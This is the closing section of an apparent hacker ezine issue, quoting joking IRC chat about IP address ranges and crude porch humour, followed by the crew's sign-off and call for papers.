[16:23] fucked if i know
[16:23] was it 999.999.999.999
[16:23] but I would sell it
[16:23] oliverjhudson93, I hope you are trolling
[16:23] cause otherwise
[16:23] that was the most retarded thing
[16:23] I have ever heard
[16:23] nah i'm pulling your leg :P
[16:23] good
[16:23] (im joking)
[16:24] cough liar
[16:24] you are joking about lying?
[16:24] i'm joking about joking?
[16:24] I don't know anymore
[16:24] I'm gonna DDoS 127.0.0.1 D:
[16:25] oliverjhudson93, what is the highest IP someone could have?
[16:25] not even taking into account the limits set in place for broadcasts blah blah blah
[16:25] straight up, highest IP address
[16:25] 255
[16:26] I don't actually know
[16:26] but i figure
[16:26] 255.255.255.255?
[16:26] but thats like
[16:26] subnet mask or some shit that I don't understand
[16:26] technically it's 256.256.256.256
[16:26] but as we have limits imposed
[16:26] yes
[16:26] 255.255.255.255
[16:26] See I dun goof'd!
[16:27] urr no
[16:27] it is 0-255
[16:27] yea I fubar'd
[16:27] because that is the range of values you can store in an 8bit number
[16:27] you don't know
[16:27] how hard
[16:27] I headdesked
[16:27] after I typed that
[16:27] :P
[16:27] I am embarrassed for you
[16:27] and was hoping no one would catch it

A shitty situation
----------------------------------------------------------------------------------------------------
[21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?
[22:05] <~Silks> what if I were to?
[22:06] <&storm> i would be curious to see that since i don't have a porch
[22:06] <~Silks> what do you have that I could shit on?
[22:07] <&storm> the dorm building has a stoop, i guess
[22:07] <&storm> well, not really actually
[22:08] <~Silks> what about siblings?
[22:08] <~Silks> do you have a sister?
[22:08] <&storm> i'm an only child
[22:08] <&storm> :(
[22:08] <~Silks> ditto
[22:08] <~Silks> however that means you have a lot of stuff
[22:08] <~Silks> and therefore a lot of things to be fouled
[22:09] <&storm> this is very true
[22:10] <&elchupathingy> what if
[22:10] <&elchupathingy> we built a porch
[22:10] <&elchupathingy> then shit on it
[22:10] <&storm> i like your thinking

GTFO emo storm
----------------------------------------------------------------------------------------------------
[01:12] sometimes i message myself to check if i'm still connected
[01:13] that sounds depressing as hell

We could go on, but that would only embarrass us more. And everyone knows the first rule to being a sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS. Yeah, whatever.

So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submit content for future issues, our contact information is in the introduction. The call for papers for issue #5 is now open, so get your crap in. See you in the summer.

<3, the gny crew

irc.gonullyourself.org +6697 #gny

[==================================================================================================]